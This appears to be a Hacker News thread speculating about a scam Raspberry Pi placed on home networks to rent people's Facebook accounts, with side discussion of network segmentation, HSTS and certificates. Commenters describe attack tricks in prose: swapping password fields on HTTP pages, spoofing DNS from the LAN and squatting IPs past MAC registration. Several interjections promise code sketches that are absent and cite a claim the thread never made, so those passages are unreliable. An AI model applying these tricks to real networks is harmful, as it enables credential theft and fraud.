I think Chrome for a while has simply refused to let you visit a page when there's an SSL problem (at least for certain types of problems), which seems like a reasonable solution to the "people will just ignore warnings" problem.
Whilst it's certainly a scam to do with advertising [0], it doesn't look like there's any evidence that the scam has anything to do with 'stealing' anything from the network / network traffic:
> Facebook has several mechanisms in place to protect your account. We make every attempt to work within the these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.
I find these claims extremely dubious. Everything they claim the Pi is needed for can be accomplished without the equipment and postage costs with a purely software solution; The hardware allows them to monitor all traffic and avoid antivirus/firewalls. Moreover, I doubt it is difficult to find mass-market Facebook accounts for much less than $15/month - it is far more likely that, given the hardware allows them unfettered access to all network traffic, it is designed to report back as much data as possible, ideally including plaintext passwords and banking information.
In this case, having a distributed botnet of Pis at people's houses would make sure you didn't get IP blocked by Facebook, since there are also legitimate users at that IP. Facebook probably would not block it, and even if it did unplugging and plugging back in the modem is enough for most residential gateways to get a new external IP.
The hardware gives a better guarantee of botnet uptime though. If you want it to be powered on and attached to that network 24/7, you can't rely on their laptop/desktop.
>Why do you need my account? Why not use your own? We have plenty of our own accounts. We need you because no matter how many accounts we have internally, Facebook limits the amount we can spend per account. By working with people like you, we are able to scale our business.
Can somebody explain if this makes sense? Why are there limits on account spending?
Look lower down that thread for the FAQ from the company: they're using the roommate's Facebook account to purchase targeted ads on Facebook in order to evade Facebook's internal controls. https://www.reddit.com/r/Scams/comments/2vd1g8/scam_rentyour...
Sort of tongue in cheek, since I don't know the range of state of the art acoustic side-channel taps. I guess you'd also probably have power fluctuations and network timing channels to exploit.
Plus, a lot of different points at which to attempt to insert a second stage into the connected devices themselves, using all the tricks everyone else in this thread has mentioned.
If I had to guess, it's providing VPN endpoint/relay services to scammers (CC fraud, etc) who need actual residential IPs to buy things from. Or to use to set up accounts/sockpuppet accounts for things like automated reddit vote manipulation.
It's obviously located "inside" the residential end user's router/NAT, on their wifi, so it'll have something like an openvpn or ipsec daemon on it that initiates a connection to an endpoint elsewhere on the internet, building a tunnel for the botnet operators to control it remotely. Or via tor to a tor hidden service somewhere, like many purely software trojan botnets for win32/win64, but in this case it will have the vpn or tor binaries running on its own dedicated raspberry-pi class device.
If you have a botnet of several thousand devices which can be made to look indistinguishable from legitimate "ordinary non technical user sitting at home on their comcast connection with their laptop or tablet", you can do all sorts of things. Relay http/https traffic for a click farm in Bangladesh where people are upvoting reddit comments en masse to promote a product, sockpuppet facebook account comments for political campaigns and pushing political agendas (russian internet research agency, anyone?), etc. The goal here is to make the traffic look like legit single end user residential internet traffic and not traffic that's coming from netblocks of major colocation/dedicated server/VPS/VM hosting companies, whose ARIN/RIPE/APNIC space is all documented as such.
There's fraud detection systems which will trigger if you're trying to buy something like amazon gift cards from a /20 netblock of an ISP in Bulgaria, but are less "suspicious" if your traffic and useragent, etc, are all coming from a Frontier, Centurylink, Comcast etc netblock in a major American city. Stuff like the maxmind geolocation data correlating closely with the billing zipcode/shipping zip code of what you're trying to buy with a stolen credit card, or other identify theft type scams.
If you're doing some variation on a massive vote manipulation service, there are also fraud/botnet detection systems which will trigger on large volumes of upvotes (or similar manipulation) all coming from the same geographical location and netblocks. Your traffic looks more like legitimate end users' if it is geographically distributed across many states and provinces, many English-speaking countries (AU, NZ, CA, UK, etc), and across many ISPs and several different common end user browser useragents (Edge, Chrome, Firefox, etc). Imagine if you threw 500 darts at a map of the USA on a wall and distributed all your botnet devices randomly around the map, vs having 300 devices all on the same network in the Chicago metro area, for instance.
There are companies out there that offer proxies from 'real' US resident IP addresses. I think these companies use tactics like this to be able to offer real residential IPs (and not IP ranges belonging to hosting companies)
This is the first one that came up on Google - https://stormproxies.com/ - I'm not saying that specific company is in any way related to this device or tactic (it is just the first on Google for 'residential address ip proxy'), but I think it is companies similar to this that will pay people for access to their routers and sell that access.
What I find noteworthy about that stormproxies website is that unlike any sort of legit ISP, there's no information on what company is actually behind it, phone number, mailing address/street address, etc. I bet if you played follow the money with its credit card payments the money goes to a bank account in Cyprus or something.
It's a slick html template and some marketing text masquerading in front of a service obviously sold to greyhat/blackhat end users.
(perspective: I work for a legit ISP that has real things that physically exist in many POPs at layer 1 in the OSI model).
They've gone well beyond the extension now. These days you have no idea if that "free" app you've installed has made a deal with Luminati to sell your bandwidth to the highest bidder. They also have an Android SDK too. I've received several emails like the following:
> My name is Lior and I lead the SDK partnerships at Luminati. I assume your
> software earns money by charging users for a premium subscription or by showing
> ads - both models do not pay out much and harm the user experience.
>
> We now offer you a third option.
>
> Luminati’s monetization SDK for Windows desktop provides your users the option
> to use the software for free, and in exchange we pay you $30,000 USD per month,
A somewhat dated reminder that "Social engineering is the best engineering." when it comes to getting around security blocks. As Natasha said to Boris, "I said system is 'Idiot proof' not 'Moose proof'!"
For serious. the kind of idiot who would hand over facebook credentials, bank account info, and physical network access for fifteen bucks a month to a total rando is also the kind of idiot who will dig up their roommate's social security card to help them out when the nice person from the IRS calls about back taxes.
Still, network security is extremely hard when the actor has physical access to your networking hardware. I currently live in a dorm situation and put each roommate on their own separate vlan on their own separate wireless gateway behind an f5 firewall running snort and I'd still be at risk if one of my roommates decided to put something between my gateway and the router.
I dunno. Locking down some things may make sense. But, for the most part, assuming that physical security for your wired home network is sufficient doesn't seem like an unreasonable assumption combined with standard practices for your systems.
I like some cryptographic guarantees, so my trusted devices get to be on an overlay WireGuard-based VPN, and access from the actual ethernet/LAN gets blocked. The VPN still uses IP/port blocking, but thanks to WireGuard, you can be sure that the source IP really matches the device you think it does.
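For anyone curious what that setup looks like, here's a hypothetical wg0.conf sketch — the keys, addresses, and device names are placeholders, not from the comment above. The property being relied on is that each peer's AllowedIPs entry pins its overlay IP to its public key: WireGuard drops any decrypted packet whose inner source IP doesn't match the key it arrived under, so a packet "from" 10.77.0.2 must really have come from the laptop's key.

```
[Interface]
# Hub end of the overlay; 10.77.0.0/24 is a made-up overlay subnet.
Address = 10.77.0.1/24
PrivateKey = <server-private-key>
ListenPort = 51820

[Peer]
# laptop - its overlay IP is cryptographically bound to this key
PublicKey = <laptop-public-key>
AllowedIPs = 10.77.0.2/32
```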
Imagine a small loop-back-like device which is plugged into all open network ports - if any of them are removed from a network port, an alert is generated stating "device from port 48 on switch 1 in closet 0 was removed"
In general it's best practice to leave unused ports on managed switches in an admin down/shut state until something you know is connected. Or live, but in a quarantine VLAN.
Your idea, however, is not totally uncommon: have a Raspberry Pi-sized device at an offsite location, specifically not plugged into any sort of UPS, which is monitored by various alerting systems. In addition to the alerts that one should get during a grid power failure event from managed UPS and automated generator transfer switch systems, the disappearance of your "UPS canary" can indicate that something is going on at an unattended site.
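The alerting side of such a canary is essentially a dead-man's switch: devices check in periodically, and silence past a threshold raises a flag. A minimal sketch (class and method names are mine, not from any monitoring product):

```python
import time

class CanaryMonitor:
    """Track heartbeats from 'canary' devices; flag any that go silent."""

    def __init__(self, timeout_s=300.0):
        self.timeout_s = timeout_s
        self.last_seen = {}  # device name -> last heartbeat timestamp

    def heartbeat(self, device, now=None):
        """Record a check-in ('now' is injectable so this is testable)."""
        self.last_seen[device] = time.time() if now is None else now

    def missing(self, now=None):
        """Devices whose last heartbeat is older than the timeout."""
        t = time.time() if now is None else now
        return [d for d, seen in self.last_seen.items()
                if t - seen > self.timeout_s]
```

In practice you'd run `missing()` from a cron job or monitoring loop and page on any non-empty result.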
My college used to do similar. If you did not register your MAC address, you would be DHCP assigned into a walled-garden IP block.
We found we could run an IP scanner on the authorized subnet (from a computer with a whitelisted MAC), and find the unused IPs, and just set those statically for 'visitors'.
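That scan is simple enough to sketch. A hedged toy version — the subnet is a documentation range, the `ping` flags assume Linux, and note the caveat that hosts with ICMP filtered will look "free" when they aren't (a real scanner would also check ARP):

```python
import ipaddress
import subprocess

def is_alive(ip):
    """One ICMP echo with a 1-second timeout (Linux 'ping' flags)."""
    return subprocess.run(
        ["ping", "-c", "1", "-W", "1", ip],
        stdout=subprocess.DEVNULL,
    ).returncode == 0

def unused_ips(cidr, alive=is_alive):
    """Hosts in the subnet that don't answer ping -- candidates for
    statically squatting an address, as described above."""
    return [str(h) for h in ipaddress.ip_network(cidr).hosts()
            if not alive(str(h))]
```

The `alive` parameter is injectable so the sweep logic can be tested without touching a network.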
Out of curiosity, you couldn’t just guess them based on knowing a couple? Or do people assigning them in some fashion that isn’t consecutive within the block?
The board is a Nano Pi NEO. It costs $15 and contains a quad-core Cortex-A7 along with two USB (2.0) ports and 100 Mbit Ethernet. It is about 25% of the size of a Raspberry Pi.
By the way, the same Chinese company now offers a much more powerful board called the Nano Pi M4, which is just a bomb compared to the Raspberry Pi B+ if you look at its specifications.
This is overblown, isn't it? That thing can't do anything that a public wifi couldn't, and yet everyone connects their laptops to those without hassle. SSL is nearly everywhere now...
If a user wants their free wifi enough they'll be happy to click through those pesky warnings that the root cert is not trusted. They'll probably not think anything of it if it loads as normal, even with a big angry red cross. The speed at which users rip though Windows UAC warnings is astonishing.
https:// with no extra options is still very much prone to downgrade/stripping attacks, and first-time connections to an https:// site are particularly vulnerable since a lot of the extra hardening options (HSTS in particular) can be nullified through TOFU.
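To make that concrete, the hardening a site opts into lives in one response header. Here's a small parser for the Strict-Transport-Security value (the dict keys are mine); per the head of this thread, a site only escapes the first-connection TOFU window if it sets a long `max-age`, `includeSubDomains`, *and* `preload` — and has actually been accepted into the browsers' preload list:

```python
def parse_hsts(header):
    """Parse a Strict-Transport-Security header value into directives."""
    out = {"max_age": None, "include_subdomains": False, "preload": False}
    for part in header.split(";"):
        part = part.strip().lower()
        if part.startswith("max-age="):
            out["max_age"] = int(part.split("=", 1)[1].strip('"'))
        elif part == "includesubdomains":
            out["include_subdomains"] = True
        elif part == "preload":
            out["preload"] = True
    return out
```

Anything short of that full set leaves at least one unprotected first request for a stripping proxy to pounce on.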
I expected click fraud, but if the description is accurate (and I don't have much of a reason to believe it isn't, since it describes pretty shady activity if you read between the lines), they're using the accounts to post shady ads that Facebook doesn't allow (and bans accounts for) until the account gets banned.
Also, the participant is supposed to get paid after they send the Raspberry Pi back after the account got banned, i.e. once the user has absolutely zero value for the scammer... I don't see why the scammer would pay... (although it may be chump change compared to the money they make from getting a percentage of the ad spend, so maybe it's worth paying that to get a better reputation).
It's also three (!) years old, which is crazy to think someone has been mailing these out and running the same scam on FB without getting caught, particularly from 2016 on, with the scrutiny placed on FB's illegitimate political ads
Surely it would be fairly easy for FB to fingerprint the "browser" running on these devices and see that it isn't a regular user? At the very least get them to jump through some hoops or enter a CAPTCHA or something?
Ok, so it looks from that like the Pi is there to act as a VPN endpoint of sorts to allow the operators to use the recruit’s Facebook account undetected by FB’s geolocation security. From which it would appear they then run some sort of high-volume affiliate marketing scam.
I think it's the subs moderators that cut off new posts. I think that's something they do quite frequently when something has been identified to a reasonable level.
Yes, this is it. When a post 'blows up' like this and gets linked to from a bunch of outside sources, it creates a big spike in the volume of comments in the moderation queue---i.e., more work for the (unpaid) mod team. If these comments are all tangential to the subreddit's purpose (here, identifying unknown objects), it can be much easier just to lock the thread.
Yeah, I have no idea how it could accomplish what is alleged. Just lots of very bad no good end of world comments. Have none of these people ever used public wifi?
It's clearly not good to have an unknown but presumptively malicious in some way, shape, or form computer on your home network. And I would be cautious about uploading the device's file system and strongly consider changing various passwords. But, yeah, it's not like the computer suddenly has root access to everything else on the network.
This situation is totally totally unlike public wifi!
When I connect to public wifi, the attack surface into my laptop is the external interface of the latest MacOS, with firewall on. Perhaps there are exploits against that, but they're not common. The Mac does have pf, but I'm sure it's a way out of date version! :)
OTOH, "this thing" on the inside of a router/firewall has complete unrestricted access to the LAN. At my house I have (and I just checked) 35 active IPs behind my firewall. It's not hard to get to that number for 4 people: iPhones, TiVos, laptops, desktops, access points, printers, gaming consoles.
I confess I don't secure my LAN computers very well. I have, e.g. 3 letter passwords. That's simply to keep my kids from accidentally going where they shouldn't be.
I'm not alone in my lax security. I do occasionally peruse exit traffic and check firewall logs, which probably puts me somewhere in the most secure 1% of "typical" households.
And even if I were totally paranoid, what can I do about the Internet of shit? Am I supposed to strictly segment everything? At what point does prudence and caution drift into paranoia?
My rule of thumb is: if I have root on the device, it can go behind my private LAN firewall. If I don't have root, but the device requires Internet, it goes on the guest network, which gets throttled and has no access to my LAN. I also scrutinize outbound more on this network. If I don't have root and it doesn't need Internet? It stays airgapped.
Decent rules of thumb, though even with root I'd base it more on whether the device really needs general access or not. Speaking of which, a corollary I use is: if an IOT device requires internet access it's automatically bad and I won't even consider it. If they want to offer some built-in but fully optional "access away from home" that wants to use their cloud that's fine, I can just block that anyway and use VPN. If it wants to access one specific address for updates (though you don't have to) or as an optional passive information feed I can see that. But anything IOT that depends on remote resources for its core functionality is right out.
That eliminates a surprising number of IOT devices, but given the flood of crap I think that's no bad thing. These days being able to have something be LAN only with zero service tie-ins seems a decent low pass filter to narrow down choices before diving any deeper.
To be honest, I found that easier than prudence and caution. New access point, stick all my IoT devices on there, then I don't have to particularly worry about what they are doing, they can't access anything interesting anyway (no outbound traffic, inbound traffic is only allowed from one device on my LAN).
A "smart" TV is presumably running content ID on everything that shows up on its screen, a fitness tracker is (of necessity) monitoring your physical activity, ... you get the picture.
I'm not paranoid that someone is tracking me in particular, or even that they would find anything interesting if they did (I'm really pretty boring in the greater scheme of things). Rather, not knowing what is being collected, by who, where it is stored, how long it is retained for, what metadata is attached to it, if their database has been (or is likely to be) breached, etc, means that there's no way for me to confidently assess what my future risks might be. Keep in mind that anonymous data often isn't so anonymous (https://en.wikipedia.org/wiki/De-anonymization).
At this point, something not being an IoT device is a major selling point for me.
> A "smart" TV is presumably running content ID on everything that shows up on its screen
And? There's no outbound traffic, so it can't do anything with it. The only risk is if it caches everything indefinitely and if I happen to connect to another network. I should have added that anything that _needs_ Internet access gets vetted much more closely.
I was also thinking more of home-automation-like devices, where it does _almost_ eliminate the risk. It can't access my main network, so it can't see any of my traffic, it can't phone home, and I don't have to worry about security vulnerabilities (it's not exposed to the Internet, so you'd probably have to compromise my main device first, at which point I have bigger problems, and even if it was compromised it can't initiate any outward connections, blocking, e.g., its use in a botnet).
Whoops, just reread your previous comment and somehow I missed the "no outbound traffic" part. That would indeed seem to largely eliminate the issue, although I wonder how long it will be until devices start communicating with each other wirelessly to exfiltrate cached data. I realize that last sentence sounds paranoid, but nonetheless it would already appear to be well on its way to a home near you. For example (http://www.m-87.com/):
> Our software for the Internet of Things creates a Proximate Internet, intelligently discovering and connecting edge devices when they are in offline environments with poor or non-existent network connectivity. This opens up new edge networking solutions for data trapped in IoT sensors, controllers, or mobile computing devices in challenging environments.
I'm willing to bet your cell phone has a data connection, and while I'm sure yours is running LineageOS or an equivalent, what about that friend you invited over for dinner later?
> although I wonder how long it will be until devices start communicating with each other wirelessly to exfiltrate cached data
At that point I'd have to reconsider. I did wonder about the devices finding a open WiFi point, but at some point you have to draw the line between reasonable precautions and paranoia, and there are none near me (currently) anyway.
>And even if I were totally paranoid, what can I do about the Internet of shit? Am I supposed to strictly segment everything?
Frankly yes, or at least it should be in the back of your mind when you inevitably need to upgrade some gear down the road anyway and thus the marginal cost is lower. People on HN talking about Ubiquiti probably sounds like a broken record at this point, and there are certainly other providers and solutions, but you should recognize that solid centralized management and VLAN functionality and the like now have fairly good SoHo options at SoHo pricing too. You don't need to run right out and buy stuff, particularly since 802.11ax looks like it'll be a much more significant general upgrade than anything since the original AC, with its focus on more efficient utilization rather than theoretical peaks.
But when you do, you should be getting something that lets you trivially soft-segment your network at will. At the least shoving IOT, any VoIP, and any cameras onto their own VLANs separate from your main systems is a good idea (not just for security but it can help performance too for VoIP, if you ever use it). At this point particularly with IOT I'd consider that a minimum required feature for any network gear to even be on the list for an upgrade.
>At what point does prudence and caution drift into paranoia?
At the point where hacks aren't trivially automatable for drive-bys and the difficulty of anything more is higher than the value of getting your stuff. When it comes to IOT, though, that point is regrettably a long long LONG way off; the security practices in that space are so utterly abysmal even before the typical practice of no updates ever comes in, assuming it's not actively backdoored. And of course this isn't just about you, IOT botnets are a threat to the whole net.
There certainly can be histrionics around this stuff that aren't justified, but I don't think basic segmentation, firewalling, pi-hole, and (if you must have your IOT on the public net though really you should consider using a VPN instead please) strict IP whitelist access or at least rate limits are unreasonable at all. Certainly not for the HN crowd. We can do our parts at least for our own benefit, and maybe[0] even help keep a few coworkers/family/friends/neighbors from contributing their uplinks to DDOSing our stuff too.
0: I genuinely mean "maybe" there, I know very well the payless thankless time sink it can be to take on any sort of IT work after hours. Depends on what family and friends are like. Still, sometimes though fairly low commitment/high return tips are available, or some simple trade of skills, an afternoon helping set up a better network for an afternoon of them helping with something.
Interesting that it is "worth" $15/month. Maybe they were never going to pay up. But if they were, that seems expensive when they could just use compromised PCs and devices for ... whatever they are going to do? Plus they had to buy and supply the dongle.
I wonder what the average time the user will disconnect it after they don't get paid?
It may be worth it to just sacrifice it after a month. I am sure it is profitable, but as people become more aware, it will be harder for them to do this.
It seems like they're fishing for gullible Facebook users on Craigslist. I found an example of a Craigslist posting that tries to "rent" your Facebook profile:
My guess would be either a MITM auth capture, rootkit inject or someone (even a nation state) trying to attribute sources of illicit facebook ads/posts to unsuspecting citizens.
I'd understand why someone would be tempted to install something like this for $1500... Maybe even $150. But $15!? If you're that desperate why not get 3 friends to donate $5 each or something? I'm sure they'd understand if it was truly life-or-death.
A RIPE Atlas probe is a small TP-Link device that needs a LAN port on your network and USB power. It forms a VPN back to RIPE, and uses traffic outbound via the default gateway it gets via DHCP to report metrics like uptime, latency to various destinations on the internet, what its external IP is outside your NAT, what ASN it's on, whether your ASN is having reachability issues to the "whole" internet, etc.
many medium and large sized ISPs host RIPE probes at different geographic locations in their networks.
Want to see what's in the initramfs. It almost certainly doesn't have his data on it (it looks to me like it never writes anything to the sdcard, at least not that partition)
> I have a Raspberry Pi right now in my hands fron rentyouraccont.com, i have it running diagnostics on an Air-Gapped pc. This thing is wild. Every second it tries to connect to bot-net programs. It not only buys ads on facebook (which btw i cannot find code that it actually does this) but it is creating links to malware ridden embeds. It is part of a Botnet, i can say for sure. Every second it tries to establish a connection to the botnet, its like a bee thats lost its colony. Register for one and put it on an air-gap, you wills see excatly what im talking about. It records EVERY KEYSTROKE sent of the network, even SSL connection.
so this was a linked comment from a thread 3 years ago....
How is that even possible? How does it capture keystrokes (unless you mean Google searches where each key is sent for autocomplete). How does it break SSL?
Some areas of IT are in guarded rooms, with walls of a certain thickness, filtered power, external RF signals killed, and airgapped except for specific patterns for transfering between external systems.
You probably just want to buy a YubiKey and accept that a lot of computing is built on a house of cards with respect to trust.
If the site is non-SSL, then there's nothing stopping somebody in control of the network from replacing all "password" fields with plain "text" fields, and then applying a custom font to them so every character entered is displayed as a "•"
That's basically what a password field already is. That would make no difference to anything - the password would be sent over the network in exactly the same way either way.
No. The point of switching out a password field for a text field is to prevent the browser from warning about the existence of a password field on a non-HTTPs secured page. This is a well known, and old trick.
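The rewrite itself takes a few lines. A toy sketch of what a MITM with control of a plain-HTTP page could do — the class name and CSS are mine, and `-webkit-text-security` is a nonstandard WebKit/Blink property, so this is illustrative, not a universal recipe:

```python
import re

# CSS that makes a plain text input *display* like a password box.
MASK_CSS = '<style>input.fake-pw { -webkit-text-security: disc; }</style>'

def rewrite_password_fields(html):
    """Turn password inputs into text inputs (dodging the browser's
    'password field on an insecure page' warning) and prepend CSS so
    typed characters are still masked on screen."""
    rewritten = re.sub(r'type\s*=\s*["\']password["\']',
                       'type="text" class="fake-pw"', html,
                       flags=re.IGNORECASE)
    return MASK_CSS + rewritten
```

Either way the credentials travel in cleartext; the rewrite just removes the visual cue the browser would otherwise give.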
Chrome changes the "Not secure" in the address bar from grey to red (and displays a red exclamation mark symbol there) when data is entered into the form.
Which version/OS? I have the latest Chrome (69.0.3497.100) on macOS 10.13.3, and I see no red exclamation mark. Nothing changes or warns me at all when I start entering data in the fields.
It's not enabled by default on the latest Chrome, at least for macOS (10.14). You can enable it using the #enable-mark-http-as flag, after which HTTP pages with password fields will look like this:
The box controls the DNS; majorwebsite.com points to any server the attacker likes.
The only defense is HSTS/certificate-pinning, for sites previously visited with that browser & device (it’s a TOFU security model).
HN has HSTS, but not Reddit, or my credit union, or my local pizza place, or Kaiser Permanente, etc. etc. etc.
EDIT: I believe e.g. Chrome and Firefox bake in some major certificates, which would also likely flag MITM attacks, for those sites.
EDIT II: Someone responded below (since deleted) that you’d also need that cert to be signed by a CA your browser trusts, which is true. My explanation is faulty/poor. Better informed discussion of attacks further down the thread!
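To illustrate how little it takes to "control the DNS": a rough Python sketch (hypothetical function names) of the packet-building side of a spoofing resolver that answers any A-record query with an attacker-chosen address. A real box would bind UDP port 53 and hand itself out as the resolver via DHCP; only the wire-format construction is shown, and it assumes a minimal query of header plus one question.

```python
import struct

def encode_qname(name: str) -> bytes:
    """DNS wire encoding: length-prefixed labels, zero-terminated."""
    labels = b"".join(bytes([len(l)]) + l.encode()
                      for l in name.rstrip(".").split("."))
    return labels + b"\x00"

def build_query(txid: int, name: str) -> bytes:
    """A minimal A-record query, as a stub resolver would send it."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack(">HH", 1, 1)  # A, IN

def build_spoofed_response(query: bytes, ip: str) -> bytes:
    """Answer any A query with an attacker-chosen IPv4 address."""
    header = query[:2] + struct.pack(">HHHHH", 0x8180, 1, 1, 0, 0)
    question = query[12:]                        # echo the question section
    answer = (b"\xc0\x0c"                        # compression pointer to QNAME
              + struct.pack(">HHIH", 1, 1, 60, 4)  # A, IN, TTL=60, RDLEN=4
              + bytes(int(o) for o in ip.split(".")))
    return header + question + answer
```

After that, majorwebsite.com resolves wherever the attacker likes, and HSTS or a pinned/baked-in cert is about all that stands between the victim and a look-alike login page.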
The X.500 series Common Name is a weird thing to fixate on here. It's an arbitrary free text "name". The only reason it's even sometimes useful in the modern era is that the CAB BRs say it has to match one of the SANs so it will probably be a DNS name. But even there good luck, it took until 2016 or so to get the last stragglers to obey that rule properly without "misunderstanding" it and unlike SANs it isn't defined to be DNS A-labels so it may have arbitrary Unicode text.
Most browsers stopped even looking at the CN, or only do so for people's crappy home-grown private CAs.
Anyway, what makes certs trustworthy isn't the CN, it's a chain of two or more digital signatures leading to a trusted root. And the CN in that root, while it had to be truthful when written, may be twenty years old, so it's nonsense now.
Leaf certificates have a maximum permitted lifespan of 825 days (down from 36 months)
But I wasn't talking about leaf certificates. I expressly mentioned this for the CN in _root_ certificates, and it's pretty common for those to have a lifetime of ten, fifteen, even twenty-five years.
Here's an easy-to-remember example: https://crt.sh/?id=1, the first entry in the crt.sh database.
The Common Name on that certificate is "AddTrust External CA Root". So... who are AddTrust? I actually have no idea. This root is today controlled by Comodo, a CA in the United Kingdom but you'd never guess that from the certificate.
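To illustrate why the CN doesn't matter in modern validation: RFC 6125-style hostname checking matches against the certificate's DNS SANs and ignores the CN entirely whenever any SANs are present; CN matching survives only as a legacy fallback. A rough Python sketch of that rule (hypothetical helpers; no IDNA handling, and only a single left-most wildcard label is supported):

```python
def label_matches(pattern: str, host: str) -> bool:
    """Case-insensitive match; '*' may stand in for exactly one
    left-most label, so '*.example.com' matches 'a.example.com'
    but not 'a.b.example.com' or 'example.com' itself."""
    p = pattern.lower().split(".")
    h = host.lower().rstrip(".").split(".")
    if len(p) != len(h):
        return False
    if p[0] == "*":
        return p[1:] == h[1:]
    return p == h

def hostname_allowed(host, sans, cn):
    """If the cert carries any DNS SANs, the CN is ignored entirely;
    only legacy certs with no SANs fall back to CN matching."""
    if sans:
        return any(label_matches(s, host) for s in sans)
    return cn is not None and label_matches(cn, host)
```

Note the consequence: a cert whose CN happens to equal the hostname is still rejected if none of its SANs match, which is exactly why an arbitrary free-text CN like "AddTrust External CA Root" is harmless noise.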
> That's assuming the box can generate certificates trusted by the target machines - there's a reason the CN field exists.
If you're dumb enough to install one of these boxes on your network, you might also be dumb enough to install an attacker-provided root certificate on your PC.
The sort of people who could be convinced to install one of these things on their network in exchange for a theoretical $15 per month wouldn't be deterred by a broken-SSL warning.
Eh... no. It’s going to pick up worthless SSL-encrypted TCP packets, but not keystrokes.
People need to calm the hell down here. If you’re connecting over HTTPS to most of the web, the only thing this thing is going to do is collect worthless packet traffic. Woot woot.
It’s not meant to collect data; it’s meant to act as an agent in a larger network of these things, to collectively impact something or other in whatever way. But they could give 2 poops about the traffic on your local network.
I agree, people are really looking into the keylogger theory, but actually I think the goal of the scammer is to have a "legitimate" (residential) internet connection with which to register hundreds of online accounts, or purchase ads, etc. If the IP gets blacklisted by a service (like Facebook), no problem, the account holder will probably notice that they can't get to Facebook anymore, call up the ISP and get a brand new IP address. All this for just $15/month.
[1] https://www.reddit.com/r/whatisthisthing/comments/9ixdh9/fou...
[2] https://pi-hole.net/